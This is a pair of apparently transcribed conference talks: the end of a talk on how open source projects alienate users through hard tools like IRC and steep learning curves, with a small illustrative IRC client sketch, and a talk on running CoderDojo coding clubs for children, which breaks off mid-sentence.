Now this is problematic for a number of reasons, not the least of which is all of your logs are belong to some company, which I actually, I have great respect for the folks who work at Slack and I think that they're doing a great job. But I find that development to be problematic, right? We've had this open communications tool since forever and now people are not using it and they aren't using it because they find that their users and people that they are trying to integrate into their project communities find IRC too hard to use. So how many folks in the audience are IRC users? Okay, about half the hands, maybe more than half the hands are going up. So do you think using IRC is easy? Yes. Anyone think using IRC is hard? One, two, okay, three. Okay, wow. Brave souls who are willing to admit that this is true, that IRC is hard. So I had a very recent experience where I was working with a young woman who wanted to volunteer as a member of the open source initiative. So I am on the board of directors for the open source initiative. They are the nonprofit organization that approves new open source software licenses and who protect and promote the value of open source software worldwide. So I'm a volunteer there and I was working with someone who wanted to volunteer to help us find more volunteer help to do work that was good for the OSI like documenting best practices for open source employment practices and things of that nature. So she came to me and she said, you know, well, I have this volunteer plan and here's what we're going to do and we're going to set up this Slack channel and we're going to invite people in for office hours and it was a good plan. It was a very good plan but I did point out to her that she probably wanted to rethink the plan in the context of using IRC because as the OSI, as the open source initiative, using a proprietary tool for communications with volunteers could potentially send the wrong message and maybe that wasn't the way that we wanted to go about it. And she said, so what do I do? And I said, well, do you like talking in the browser? And she said, yeah. And I said, okay, great. So there's this tool that's proprietary but if you want to use it, that's fine. It's called IRC Cloud. You go to IRCCloud.com, you sign in and then, oh, yeah, well, okay. So that's great. So you're going to sign in with your email address and that's wonderful but then you have to pick a nickname. Okay, and then you have to authenticate to Nick serve and you should, and then you have to set your flags so that if you want to not listen to someone in the channel and like, oh, yeah, no, if you just type these commands, you can get the manual and she just looked at me and she was like, why are we not using Slack again? And I felt like I didn't have a good answer for her. This is so much overhead for so many people. And we're in a place now where it's not like it once was where those who are the creators of technology are over here in their own bubble and there are very few consumers, right? People who are the consumers of technology at this point are everyone. And if we make it difficult for them to get involved in the discussions that we have, we're going to drive them into the arms of something that makes it very easy for them to participate and where it's easy to participate, the rest of us who are deeply concerned with issues like can we have the logs of the discussion of the software project forever? 
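To make that onboarding overhead concrete, here is a rough sketch of what "just hop on IRC and say hi" involves at the protocol level, using only Python's standard library. The server, nickname, channel, and NickServ password are placeholders, and a real client needs much more (TLS, reconnection, rate limiting), so treat this as an illustration of the learning curve rather than a recommended implementation.

```python
import socket

# Placeholders -- a newcomer has to figure out every one of these first.
SERVER = "irc.example.net"    # which network does the project even use?
PORT = 6667                   # plaintext IRC; TLS is usually on 6697
NICK = "newbie42"             # must be unique on the whole network
CHANNEL = "#some-project"     # where do the developers actually talk?

sock = socket.create_connection((SERVER, PORT))

def send(line: str) -> None:
    # IRC is a line-based protocol; every command ends with CRLF.
    sock.sendall((line + "\r\n").encode("utf-8"))

# Minimum handshake: pick a nick and register a user.
send(f"NICK {NICK}")
send(f"USER {NICK} 0 * :Curious newcomer")

# On networks that run services you also identify to NickServ,
# which assumes you already registered the nick on an earlier visit.
send("PRIVMSG NickServ :IDENTIFY correct-horse-battery")  # placeholder password

# Only now can you join the channel and ask your question.
send(f"JOIN {CHANNEL}")
send(f"PRIVMSG {CHANNEL} :Hi, I'd like to help out -- where do I start?")

# And you must answer PING with PONG, or the server drops you.
while True:
    data = sock.recv(4096).decode("utf-8", errors="replace")
    for line in data.splitlines():
        if line.startswith("PING"):
            send("PONG " + line.split(" ", 1)[1])
        print(line)
```

Compare that with "click the invite link in your browser" and it is easy to see why newcomers drift toward hosted tools, which brings us back to the worry above: if the conversation moves into a closed platform, do we still get to keep the logs of the project's discussions forever?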
Is this someplace where academic researchers studying FOS are able to get this information and query it? If we lose that, there's a problem and we're not losing that because users are stupid. We're losing that because the tools that we use seem to be so arcane to them. And then we turn to them and we tell them, no, no, no, no, it's easy and it is not easy, right? And we have this knowledge that we have had in our heads for so long because we've been doing this for such a long time that it just seems easy when really it's not. So we have ridiculously steep learning curves in open source projects. I love this. This diagram has been used for all kinds of things. This particular incarnation is MMORPGs. But this I was first introduced to as the learning curve for Drupal. And Drupal is considered to be one of the more user-friendly content management systems out there, right? So we think of steep learning curves as something to be proud of, right? Well, you have to work really, really hard and eventually you become a master at what it is that you're doing. And fair enough, right? It takes a certain amount of time and energy invested to become skillful. We know this to be true. But it's almost like this bizarre hazing ritual, right? Like, well, you know, I had to work really, really hard and no one helped me and there was no manual when I did it. And you know, it took me forever to figure it out and I had to read all the source code myself. This is not something to be proud of, right? This is not something that there is no badge of honor in making someone suffer as you have suffered. That's just sad, right? Instead of having these steep learning curves and being like, woohoo, yeah, that was really hard. We're proud of ourselves. Again, making it easy for people to engage with us. Not that they should have to do no work. Not that they should have to have no investment. Not that they should have to have no effort. But to lower that barrier to entry so that at least becomes possible for them and they're not one of these poor little people falling off the cliff or hanging themselves at the thought of using your software. Like, no one wants to be at the software project where the little stick figures are hanging themselves. It's like XKCD just had a sad moment right there. So, and things that are, I love this one. Not that I'm a VI user and thinking the Emacs learning curve is great. So now think about the things that we say are easy, right? So text editors are easy, right? It's so easy. You just want to type some text and then save a file and you're done at Hallelujah. Okay, and then we make fun of people for using tools that are too easy like Notepad. Oh, man. You're using Notepad. You're not using like Geddit or, let's see, once upon a time I was a happy VI user and now I have submitted to Geddit. But, right, we talk about people who are using the quote unquote easy versions of these, the ones where some of the complexity is abstracted away as being idiots or, you know, they're using the easy tool or, you know, but the rest of this stuff is easy too once you just figured out. And this is not, this is not fair. Our users don't care about, you know, various key bindings and learning arcane commands that really made sense 25 years ago. They just want to type a text file and hit save and be able to print it out and not have it go off the pace of paper and wonder why that happened because they do not know about the line wrap, right? 
Like, we cannot consistently think of things as easy and have contempt for people when they can't figure it out themselves. It's just, it's just ineffective. Instead of getting people through these steep learning curves, I want to get them through what Kathy Sierra, the author of a book called Creating Passionate Users, calls the kick ass curve, right? So how soon can you help your users kick ass? How soon can you help them to be ridiculously productive and doing all the things that they wanted to do with your tool? And as you can see from this awesome diagram, which I mostly like just because it says kick ass in it, you know, there is a suck threshold, right? There is always going to be a time when you're learning something new that it sucks. It's not fun. You feel stupid. You wish you knew more, right? These things are just not awesome. But that's fine. The idea is getting somebody through that suck threshold as quickly as possible so that they are kicking ass and then they become passionate advocates for what you're doing and they become contributors. People who feel good about the technology that they're using will tell other people to use it. People who feel good about the technology that they're using will say, we hope, thank you if they don't send them to me and I will explain what they should. People who feel passionate and good about what they're doing are just happier users and our happy users are going to create happy communities because there's going to be more folks participating in free and open source software projects because they understand its value and they feel good about being there instead of feeling foolish or ashamed or like people think they're stupid. Well that is very fair. The gentleman has remarked and I do not know that I can necessarily disprove his claim that many people are stupid so people are passionate about stupid technology. If anybody was attending Mr. Holly's keynote yesterday, there was a great deal of stupid technology on display including the Bluetooth enabled pregnancy test which was not good. Also apparently things I learned, did you know that your Fitbit broadcasts information to any device that is trying to collect Fitbit information so if you're all wearing a Fitbit and I sink to the cloud, I get all your data. People really like their Fitbits. I could call that stupid. I don't know that we're going to solve the problem of people doing silly things. I think it's just part of the human condition and why we are always learning. But at the very least we can assume that people who are passionate about stupid things, like you're not working on the stupid things, right? So if you're not working on the stupid things, you don't have to spend any time with those people. So at least that's better for you, right? Unless you're getting paid to work on stupid things in which case that's cool, you can get a different gig. So I think one of the reasons why we have this issue within our community where we're unkind to our users is because we have this relentless pursuit of perfection, right? We want to create the most amazing possible thing and something that is not stupid and that people will not be passionate about using something stupid. And this is not only not good for our user community, I don't think it's good for us, right? 
Like how often have you ever, like either at work or even working on a free software project, like worked with a developer who just will not stop working on that feature over there on their own in private because they don't want to show anyone their work in progress because it's really embarrassing. No hands? Wow, people have really emotionally evolved in my 10 years of experience with this stuff. Okay, so there's like five hands. Okay, well, clearly we have improved and that is lovely. But in my past experience at least, I've seen a great deal of people who simply because there is this relentless emphasis on quality or even this fear of being mocked or shamed or told that you're an idiot if you submit the wrong feature to the mailing list, right? For discussion. That people, we have this adversarial approach because we are so focused on everything being so great, right? The perfect becomes the enemy of the good when really we want something that just works. This is sad and I don't know what it says so we're going to skip it and say quality is good. We like quality. So I want to conclude with a story that I think illustrates everything that I've been talking to you folks about today. And this is the story of a young woman by the name of Angela Byron. So once upon a time, Google Summer of Code was created and Google Summer of Code for those who are not familiar with it is a program in which Google pays university students to work on open source software projects and all they work with a mentor from that open source project. The open source project is usually not technology that's used by Google or any particular company. And the idea is simply to give students access to real world software development experience so that when they show up at companies, they haven't only worked on lab projects with like two or three students involved with them and that never had to be maintained. So the real world experience. So Angie had always been interested in this whole open source thing. It really jived with her political views as a young woman. She really thought it was cool that there was this notion of free speech as part of the software development process. But she never thought that she would be good enough to be an open source developer. Those people are geniuses, not like me. She was a community college student. I don't know if there's an analog here in Germany. I guess like trade school, like you go to university for like two years instead of four years. So, you know, not as prestigious as a university education. And so, you know, she just, she thought it was super cool but not for her. And then this program came along and it was like, well, wow, you know, hey, if they're saying that it could be college students, like I could do that. I want to apply. I want to be involved. So as part of the first ever summer of code, Angie was asked to work on the Drupal project. Groovy. So she wanders into Pound Drupal and says, like, hi, I'm really excited to be here. My name's Angie and I'm one of your summer of code students and I'm really looking forward to this and I've been writing PHP for this long. And I think it's really great and I'm really excited about open source software and this is all going to be super cool and like, this is going to be great and I'm really excited and this was the response she got. Go away. This channel is for serious developers only. Right? Now mind you, this is someone who had been invited to participate in the project as someone with very little experience, right? 
This was, this is very suboptimal. This is, and these pictures, by the way, are a comic that Angie drew years later to talk about her first experience interacting with the Drupal project. So this is from the horse's mouth, as they say. And this was her reaction. And I love this because she's hiding under a blanket, which is, this is supposed to be a blanket. So she just had a miserable time and she was very sad and it was horrible and she went away and were it not for the fact that she had committed to do this like super fancy program with the Google people, she just would have stopped doing open source, period. So that was once upon a time in 2005. Today Angela Byron is one of the cornerstones of the Drupal project. She was the maintainer for, if I remember correctly, Drupal 7. She has been working as a community advocate. She has tirelessly helped to get more people involved in open source software, particularly through onboarding mechanisms like Drupal's Dojo project where newcomers to the project are paired with a mentor and kind of pulled through that steep learning curve that many people are proud of. And again, if she hadn't had the benefit of that experience that she had to keep going because this was some big fancy project with Google, we would have lost her. We would have lost her because we would have said, go away, you're stupid, this channel is for serious developers only, and you have nothing to offer us. You are not technical, you are not cool enough, users are stupid, go away. And this is why I keep advocating that when we carry these attitudes within ourselves, and this is how we behave, we cut ourselves up from the opportunity of finding the Angela Byron's of the world, right? We cut ourselves off from the opportunity to learn, to grow, and to potentially find people who can completely change the face of our project. And I just want to end with a quick plug too. When we carry those attitudes, more often than not, that attitude is you are not enough like me to be cool. You are not a developer like me, you do not understand, see like me, you do not do systems programming like me, et cetera. When we carry these attitudes, what we're really doing is effectively saying you're not like me, so you're not good enough. And when we think that people who are not like us are not good enough to help us be better, they're not good enough to give us good feedback, they're not good enough to give us something that is valuable and worthwhile, we create stuff that sucks, and it sucks because it's only good for us, and ostensibly we'd like it to be useful to the much wider world, otherwise why would we release it to the wider world? And that, my friends, is my rant. I am your user, please love me. Thank you. I love FrostCon because this is the only conference where I actually managed to speak for the appropriate length of time instead of speaking really quickly and going, oh, I should have told everybody about the international symbol of slow down. If I'm speaking too fast, you should slow down. Well, obviously that's not useful for now. Excellent. Well, bug file. I'll get it next time. Folks, are there any questions? Beep, beep, beep, beep. Nice man on the stairs. What is your question? I was interested in talking about정 So my question is, I guess, is it a problem? Paper is made from trees. And is it? OK, just checking. What's the useful way of bringing that? Because it's easy to say the users have done, they want the wrong things. We're doing something much cooler than that. Yes. 
But obviously, that's not going to help. That's just going to drive people away. So how can we get past that and, maybe somehow more gently, redirect people towards asking for what they actually need instead of the wrong things? OK, so to recap that question: the question is, how can we interact with our user community so that they are, instead of asking us for a faster horse, asking us for a car? So I think that that really goes back to education. And this, again, is where poor documentation bites us in the rear end. So somebody expects you to work on CVS when what you really want to do is create a compelling alternative to it. The only way that you are going to help nudge them in the right direction is to explain to them very clearly what it is you're doing and why you are doing it that way. And sometimes this is as simple as a one minute video tutorial that's like a screencast of going through some common commands using your program, so that somebody understands, like, oh, this is what I need to do. Often people come to a new piece of software with a lot of legacy assumptions about how it's supposed to work because of everything that they've used before. And if what you're providing them doesn't look familiar to them, they go, wait, no, no, no, I want what I had before, forgetting all of the pain points that sent them screaming from this horrible thing before to the new thing. So again, taking people through the feature set and the whens and the hows and the whys, even if it's just really briefly. It's very easy to pop open your video capturing software of choice. Or if you're OK with using proprietary software, you can just open up a Google Hangout and say, here's what I'm doing. Here's why it works this way. Here's why I think this will help make you more productive. Or why it will be easier for you to use what I've created this way. Thanks so much. And then you can point people back to that. If someone comes along and asks you something very silly, you can just say, excellent question, but I see that maybe you have not watched the video tutorial. And the video tutorial will take two whole minutes of your life. And that's all you need. So go watch it. Education is key, I think. And sometimes people are going to just ask you for silly stuff. And the best way to nudge them is to nudge them towards somebody's project that you don't like. No, wait, I would never advocate that. Any other questions? Yes, nice man sitting right there. A question about moving technical users towards contributing. Yes, OK, so this is an excellent question. For technical users, how do you move them from being users to contributors? So I'm going to start with the horrible lawyer answer of it depends. But I think that one of the ways to make that possible is to make sure that your users are most fully empowered. And actually, rather than trying to go into a very long explanation of this, I would like to refer you to a piece by a gentleman by the name of Mikeal Rogers, who wrote about the processes of creating the Node.js Foundation and the different layers of involvement. And their specific plan for moving users to contributors had a lot to do with their governance model and how they encouraged participation in the project.
So if you were a bug reporter and then you were encouraged to submit a patch and people would mentor you through the process of creating one, making sure you knew about the style guide. So it was a combination of advocacy, education, and telling people that they were appreciated. I think a lot of getting people from going from drive by random comment to sticking around is letting them know that you care. Like, I actually appreciate the fact that you're there. And in turn, I would like you to appreciate the fact that I've worked really hard on what I've created. I do not remember the article title, but I will get it for you. I think it's awesome. Other humans who want to ask things, machines that want to. Ah, up in the back. Hello, nice person. Yes. So the question is, in order to make sure that people are effectively able to participate in the open source community, do we need to put the user first as part of the design process? Because that seems very rare. And I am going to say yes. Yes, absolutely. I think that this is a great idea. And we should totally do this. And I appreciate the point that you made about having a responsibility to do that. Because I really feel like if we do not put a focus on the end user as part of our software development processes, exactly as you said, people will not use free software. I think Benjamin Mako-Hills essay about the fact that for a user of free software, the most important feature of that software is that it is free. And I respect that a great deal. But I cannot go to my family and tell them, please, please, please make use of free and open source software, because it's so important, because it's free. It respects your freedom. They're going to say, yes, that's great, Blondie. Thank you. I just need to edit a text file. And so without that relentless focus on the user and quality for the user, we're going to lose people. And I think that it has sad implications for us as technologists. But I think it has sadder implications for the way the world works. So thank you. I appreciate your point. Anybody else? Because if not, we can all go get coffee, which, you know, is compelling. Thank you very much for coming. Appreciate it. Thank you.
|
Open source software projects can be prickly toward their users. Poor documentation, a steep learning curve, and a finely tuned focus on excellence and quality can make a project community seem hostile. As users of many different open source projects over the years, Leslie Hawthorn has often wondered about this problem and contemplated what to do about it. This session takes some long-standing private rants public.
|
10.5446/32443 (DOI)
|
Hello and welcome to this talk, which Lukas will give for us. He will tell us a bit about CoderDojos and how to set them up. And with that, I will simply hand the stage over to him. If you have questions: the talk is being recorded, so he will repeat them. Have fun. As mentioned in the program, I will be speaking in English, because I know for a fact that at least one person in the audience doesn't speak German. Is there anyone who doesn't speak English? Very good. Okay, so the rest of the talk will be in English. So, the first question you might ask yourself is: what is a CoderDojo? For me, a CoderDojo is mainly a room to learn. It is a room where you go and you can learn anything. A CoderDojo, of course, has something to do with coding. You learn how to code something. But for us, for our Dojo, this can mean a lot of things. It can mean electronics, it can mean encryption, it can mean a lot of things that have to do with computers. The CoderDojo movement is a global thing. There are CoderDojos all over the world. It started in Ireland, but now there are CoderDojos on every continent. The mission of CoderDojo is to teach kids and slightly older kids to learn to code. The kids in the Dojos are between 7 and 17 years old, but there are some Dojos that also take even older kids and grown-ups into their program. The original mission was to teach kids. Okay, so that's CoderDojo. I'm Lukas. I work for a company called InnoQ. I do programming stuff, like probably most of you. That's all you need to know about me. There are a lot of CoderDojos in Germany. These are not all of the CoderDojos in Germany, there might be more. This is why there is a dot, dot, dot at the end. Some of the CoderDojos were founded this year. Some have existed for many, many years. There is one CoderDojo that I have the most experience with. That's the CoderDojo in Cologne, because I'm organizing it. I have been organizing it for about two and a half years now. So I can tell you basically anything about this particular Dojo. It's very important to note that not every CoderDojo is the same thing. Every CoderDojo has a lot of freedom in how to do what they want to do. In my opinion, when you want to do a CoderDojo, you have to find your passion and what you want to teach. If your passion is to teach everyone only JavaScript, then that's okay. That's a valid CoderDojo. Every CoderDojo is very, very different. Some meet every day, some meet every week, some meet every month, some meet only from time to time. All that is still CoderDojo. So, about our Dojo. Our Dojo was founded by Ellie Weigner in 2013, but Ellie had a lot to do, so she said, I can't do this Dojo any longer. So I took over the organization of this Dojo in 2014. And since then, we have been doing one Dojo per month, with few exceptions. For example, this month. But normally we only skip the December Dojo, because it is hard to find enough mentors shortly before Christmas, because of Christmas shopping and stuff like that. So we traditionally skip the December slot, but all the other ones, yeah, we still do them. Okay, so, when you want to get started with your own CoderDojo, I think there are four things you need. You need some goals for your Dojo, what you want to do. You need coaches, you need a location (or more than one), and you need kids to come to your Dojo, because without that it wouldn't be much of a CoderDojo. So, I will talk about how we did it. This is not the only way to do it, as I said. But you can take it as an inspiration.
You can also disagree with me in the question and answer section later on, and say, we want to do it like this, and I think this is a better way. We can also change our approach to it, because we are also open to adjusting our Dojo when there are better ideas coming in. So, our main goal is to inspire kids to do programming and technology. It's not to teach them everything. It's mainly to inspire them, because in schools a lot of kids are not inspired to get into technology. They only learn Excel and Word, and they are not inspired. They sit there and think, computers are pretty boring, and they are also brought up to be just consumers of technology. They just use programs, but they don't create new things. They just use software. And we want to inspire them to do their own thing with computers, whatever that might be. We have some kids that prefer to do 3D modeling, and that's also cool. We want to support them in that. Most of the time, they want to do games with those 3D models that they just created, and we try to help them as well. But not all of us are 3D programmers. So, it's not always super easy to help them, because they have very high demands. We also want each of them to have fun and to be creative, to create whatever they want to create. Because that's one thing that we said right from the beginning: we don't have a curriculum that you have to go through. In the first lesson you have to learn HTML, and then JavaScript, and so on... we don't do that. We ask the kids, what do you want to do here? Because we think that this will inspire their creativity. And they often see what other kids are doing and say, I want to do that as well. In the next dojo, they have all their ideas, and most of them are a little bit out of our reach. And we try to scale it down a little bit, to try to get it done somehow. And one goal that we have is to replace ourselves. We want to replace ourselves with the kids from the first generation, so they should teach the next generation. This is a goal we have not reached yet. So let's see if we will ever reach it. Maybe I will still do this when I am 80 years old, but that's okay as well. So another thing that you need is coaches. Because without coaches, you can't teach the kids. You can also do that all on your own, but I think this will soon be a scaling problem. But how do you find coaches? I think you should look into user groups. If you are attending a user group regularly, that's very easy. Just give a lightning talk: I want to do a dojo, who wants to teach? And there will be at least one person who wants to help. If you are not going to a user group, you should start going to user groups and get to know other people. Because they really want to do that as well. You can also see that there are quite a few people here. There might be other people here who are also interested in doing a CoderDojo. Another thing is, if you are working in a tech company, then you could ask your colleagues, do you want to do a CoderDojo? Or if you are studying at university, you might ask the other people who are studying with you, do you want to help me? And I found this to be quite an easy process to find people who want to help. You have to gain a lot of confidence in the people, though: when they say, I will come to the next dojo, will they really come? This is the part of the process that takes a little bit of time. Otherwise you don't know how many kids you can take into your dojo. Because you don't know if there are 10 mentors who say they will come, but only 5 come.
So you have a problem now. This is what takes a little bit of time. But you will get to know which mentors come when they say they come. Another trick to find mentors is to ask people here. You are at a conference, there are a lot of programmers here. You might meet people from the city you are living in. And they might want to do this thing with you. So an excellent chance to do that would be in this room. Or later at the socializing event. Maybe you meet people there who are interested. So, will you somehow moderate it? Because now somebody should ask, okay, is somebody from this city in here? I will repeat the question. The question was whether I will moderate that and try to connect you: yes, at the end of the talk, I will do that. Okay. Then there is the question, how do I find a location? And first you think, this will be super hard. I don't have money to buy a room or something. But this is super simple. You go to your boss and you ask, can I use our office on Saturdays, when nobody is working there? And the boss will say, yeah, of course. And then you have a room. This is at least true if you are not working in a big enterprise setting, where there are security things going on. But if it's a smaller company, I'm confident that this will work. Another thing that a lot of dojos do is talking to schools. Schools are always interested in doing something with tech. But this is a little bit harder if you want to do it on a weekend, because schools are closed on the weekend. So you have to find someone who will open the school and close it again and be responsible for everything that breaks. So this is not super simple. But I know a few dojos that do that, and it works quite well for them. Another way to do it is to go to a hackerspace or a makerspace, because they accept user groups and things like that. So they will probably also accept a CoderDojo. There are a lot of different ways to do that. For me it was really simple. I asked my boss at the time, can I use it? And he said yes, because he thought that it was a good cause to support. And since then we have asked other mentors, is your boss willing to let us do the dojo at your place? And this works quite well. And another one that came to my mind are libraries. Libraries are also very well equipped for this task. Because a lot of libraries nowadays have a computer room or a maker space room, where they have 3D printers and stuff like that. And they love to get people into the library and do interactive things there, not just reading books. So this is also a good way to cooperate. We do this every year with the library in Cologne. And it works very well. It is just that we have to move the time slot around, because of closing hours of the library and stuff like that. But you will figure it out. And then you have to find attendees. In our first dojos, we just asked the mentors to ask kids that they know if they want to come. That had the big advantage that the mentors mainly talked to kids that they already knew. So they felt more confident for their first dojos, when they were teaching. And from that point on, it was mainly word of mouth. So those kids said, I was at this cool dojo. Do you want to come with me to the next dojo? And then, maybe it was a mistake, I don't know, at some point we gave two interviews to the local radio stations. And after that we had even more kids who wanted to come to our dojos. We now have more kids who want to come than we can accept.
Maybe that was not the best idea. If you still need to get enough kids, then it is a good idea. There is also a local family magazine called Känguru that accepts events for families and for kids into its catalogue and presents them to families. They also wrote a little bit about us, and that brought in a few more kids who otherwise would not have known about the dojo. So, at this point, as I said a moment ago, we have more kids who want to come to each dojo than we can handle. So that problem is solved for us now. But don't get frustrated when you start. When we started, we had three kids at most dojos, and sometimes only two. But over time it grew and grew, and at one dojo we had 25 kids. And that was a very, very interesting dojo. We had a lot to do, and it was very loud in the room, because everyone was so excited. There are also dojos with 50 or 100 people, but that is not the dojo that I want, because I want to know everyone in the room and to see what everyone is doing. There was a comment from the audience: you could also do it at a place where young people spend their free time, because then there is an automatic audience. I will repeat that, because it is a good point, and it relates to what I said about the location. That is a very good point. I think you also reach kids that way that you would normally not reach. Then there was the question: what do we actually do at the dojo? What we do, I will answer in the next section. Okay. Our recipe for the CoderDojo is that we meet once a month, on a Saturday. We meet from 1 pm to 5 pm for a normal dojo. When we have something special, the times sometimes shift. We decided on Saturday, because if we did it on a weekday evening, many coaches would say: I had a hard day, I don't want to program any more, I want to sleep now. Then there are people who skip the dojo on very short notice. Many kids prefer Saturday as well, because on weekdays they have homework or other things to do at home. Saturday works very well for us. But some dojos do it on a weekday evening; those are usually smaller dojos, in the evening after work. Our age group is from 5 to 15, but the core group is from 8 to 15. The youngest attendee we had was 5 years old. I will show you later what she built that day. We will probably not stick to that upper number forever, because we don't want to send away the kids who have been coming to our dojo for a long time. We meet in different offices. We started in the office where I worked, and then we started going to other offices as well. We have one mentor for two kids. Normally, if a mentor is unavailable, that ratio can shift a little. But we have found that, even for people who are trained teachers, it is very hard to handle three kids, and it is super hard to handle four. Because the thing is that the kids who come here are very interested in learning.
If you sit there and answer the question of one kid, the other three are bored in the meantime. That can be very, very exhausting for you, when there is always someone sitting there with a question. So we have found one mentor for two kids to be the best ratio. Sometimes we also do one mentor per kid, but when we are at capacity, we don't do that. That is also the answer to the earlier question about laptops: how do we handle that? All of our mentors bring a laptop, so we have at least one notebook for every two kids. Some kids bring their own laptop, and they can use that as well. But we don't require it, because some kids don't have a notebook, or cannot bring one, and we don't want to exclude them. We do want the kids to bring a notebook if they have one, because it is easier for them to keep working: whatever they build stays on their own machine. Otherwise they need a USB stick, have to set everything up somewhere, and have to do the rounds again the next time. It is easier if they can just continue where they left off. But we don't want to exclude anyone because of that. So some kids bring their laptop, but not all. The next topic is money. All CoderDojos are free. The mentors are not paid, and the organizers are not paid. There is a foundation, the CoderDojo Foundation, but that is for things like the CoderDojo conference and so on. The mentors are not paid, and the kids do not pay anything. We decided that we do not take money, and we do not need money. There are other CoderDojos that do this differently. There are CoderDojos in Germany that have a registered association, so that sponsors have a legal entity they can give money to. We did not do that; we simply do not handle money at all. Having money means more work, and we have not had a problem without it, so we have avoided it so far. From time to time there are people who want to give us money, or ask about donation receipts and things like that. But we do not want to do advertising in return, and we do not see that as a good fit for us. What people do instead is, for example, sponsor pizza. Okay, another thing: there was a question about the system for assigning kids to the mentors. What is the system? The system is me. I stand at the front and ask each kid what they want to do. I know what each of the mentors knows, and then I send them over. That is my system. I don't think that would scale to 50 mentors and 100 kids, but for our size it works very well. When there is a new mentor, I always ask them first whether they want to do web programming or something else. And sometimes I simply volunteer a mentor: you know Minecraft, right? You can do that. Yes, that is the system. Okay, the next thing... oh yes, there was a question about food and drinks. Most of the companies we work with provide drinks; there are enough for everyone, so the kids can drink as well. That works very well. And one more thing: we want the dojo to feel as different from school as possible. So, one of the things I already said is we want the kids to choose what they want to do.
We don't force them to now learn Java or something. We want them to ask us: hey, I want to do a website – what do I need to learn for that? And we want to help them do that. Also, you can stop at any time. As a kid, you can say: I don't want to do anything anymore. Most of them start playing Minecraft, and at some point they come back. And that's okay, because it's Saturday, it's your free time, and if you want to play some Minecraft, that's totally okay. Also, the mentor can then concentrate on the other kid, so this sometimes also helps the mentors. So there's no schedule. There's no "now it's time to get back to the computer" – we don't do that. If anything, it's more difficult to send the kids back home when the dojo is over, and that is not a huge problem. Some mentors also force breaks: after two hours they say, let's do a little break and walk a little, because there's so much to do and so much excitement. So, what can one do at a dojo? You can do a lot of different things at a dojo. Here are some examples of what we are doing at our dojo, and there are infinite possibilities for things to do at yours. One very cool thing is doing websites. Websites are something every kid knows, because everyone is on the Internet all the time and sees websites. And this is something a lot of kids ask for the first time they come: I want to build a website. Or: I want to build an app – that's also something some kids ask for. But websites are still one of the most popular things. This is an example of a homepage that one of the kids has built. It's very colorful, and all the colors are handpicked by the children. And one thing that is really, really cool: if a kid comes there for the first time and doesn't really know what to do, we can ask them: what's your favorite website? And then we go into the web inspector, do a right click, and let the kid change the colors of the website. And you cannot imagine how much excitement this causes: I go to the school website, and now it's not ugly anymore, because it has much cooler colors. And then we have to tell them that they have only edited their local version and nobody else sees it – but they can still save it and show it to other people. So that's pretty cool. A lot of kids want to create either a homepage or a page about something they're excited about. This is the homepage of Leo – he's also in the audience. He has a webpage where he demonstrates what he has already done, among other things. I will show you a longer demo later on of one of the apps that you can see here. This is a page about the favorite books of one of the kids, where they also give ratings; if you click on one of the links, you see a longer description of what is so exciting about the book. Yeah. And this here is a bit hard to see: this is a website about the favorite game of one of the kids. It's called R-something. And it describes all the creatures in the game. I don't know this game, but apparently it has a lot of information, because I clicked through it and there were a lot of subpages. And this here is a page about animals. This was our youngest CoderDojo attendee. I asked her: what do you want to do? And she said: I want to do a website about my favorite animals. So we sat down, and all we did was googling for images and then putting them into the markup.
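To give a rough idea of what such a first page can look like in practice – the animal names and image file names below are made up for illustration, this is not the actual page from the dojo:

```html
<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>My favourite animals</title>
  </head>
  <body>
    <!-- one heading and one picture per animal, nothing more -->
    <h1>My favourite animals</h1>

    <h1>Seals</h1>
    <img src="seal.jpg" alt="A seal lying on the beach">

    <h1>Penguins</h1>
    <img src="penguin.jpg" alt="Two penguins on the ice">
  </body>
</html>
```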
And all that is required here is that you know what an H1 tag is and what an image tag is – and you can make a child very happy. This website is still up and is still shown to friends and family of this kid, because she is so excited about it. This is also something I will come back to later: you can never guess what will excite a kid. Every kid is excited about something entirely different. One kid will see this and be super happy, and will ask you to put more seals on the page, because seals are so cute, and the page will grow and grow and grow. This is a very simple way to bring someone into creating things, because you have created a collage of your favorite images. I know there's a copyright issue – don't worry about it, it's a website made by a kid; who is going to sue a kid? Then, one thing that is also pretty exciting is robots. We haven't done this in a while. We used Mindstorms for that – sorry, I almost forgot the name, it's so long ago. But the person who owns the Mindstorms is no longer in the dojo, so we don't have them anymore. We built robots that played soccer, and that was very exciting. What was really cool about the robots was that, because they are built using Lego, the kids that were very young and not yet interested in programming could concentrate on building the coolest robot, and the other kids could concentrate on programming it. So there was a dynamic in the group between the younger kids and the older kids. There were also some requirements-engineering lessons in there, because one group said the robot needs legs to walk, and the others were so excited that they built a crown or something instead. Yeah, robots. Another thing that we're doing at our dojo is electronics. Most of the electronics means blinking lights – a lot of blinking lights, because blinking lights are the best. I will show you two short demonstrations. The first one here is the Ampel – a traffic light, I didn't know the English word, sorry. Someone wants to cross the street and presses the button. Now it's green for pedestrians and red for the cars, and then it changes back again and the cars can continue. This was a project that they continued at the next dojo and made even more fancy, with detection of your finger when you came close to it, and light detection. That was also quite fancy, but it's not so easy to demonstrate in a video. Where's the other one? Oh, okay, I forgot the other one, sorry. There was another one where, if you came close with a finger, the lights would go bright, and if you moved the finger further away, it would change color. And one thing that also works really well: if you have kids at the dojo who already know Scratch, they can use that to control the electronics as well, so you can do the programming of the electronics that way. And that is something the kids love, because many of the kids who come to the dojo already know Scratch and can carry on with that knowledge. Minecraft: all the kids at the dojo love Minecraft, and that has always been the case. So for a long time we thought: we want to let the kids program Minecraft, because they are excited about Minecraft and they are excited about programming, so we should bring the two together.
And for a long time that was really hard, because the way to write Minecraft mods is Java code against largely undocumented APIs, and that is not so cool. It is hard even for someone who really knows how to program, and it is not the best way to teach someone programming. But then something important happened: something called ScriptCraft appeared. ScriptCraft is a way to program a little drone inside your game using JavaScript. And since we already use a lot of JavaScript in our dojo, it is a very nice fit. You program a little drone that flies through the world and can place blocks, so you can build all kinds of structures with it. For many kids that was an eye-opener: I could build this myself by hand, but now I can do it much faster, because I have a robot doing it for me. That is also something we will all experience in the future, when robots take all our jobs – it's a lesson for life, something worth learning early. It is very easy to get started, because the ScriptCraft website is very good, and there is a small book for teaching kids how to program with it. It's very cool. And another thing we do from time to time is let the kids build their own games, because many kids love games. A couple of our mentors put together a small game as a starting point, and the kids then program their first game on top of that. That works very well. One difference between learning to program today and thirty years ago is that kids now grow up with 3D games and so on, so we have to manage their expectations a bit at the beginning. We build 2D games, and they are still a lot of fun. Here you can see the basic principle: we have a little character, a starter project and a small tutorial that 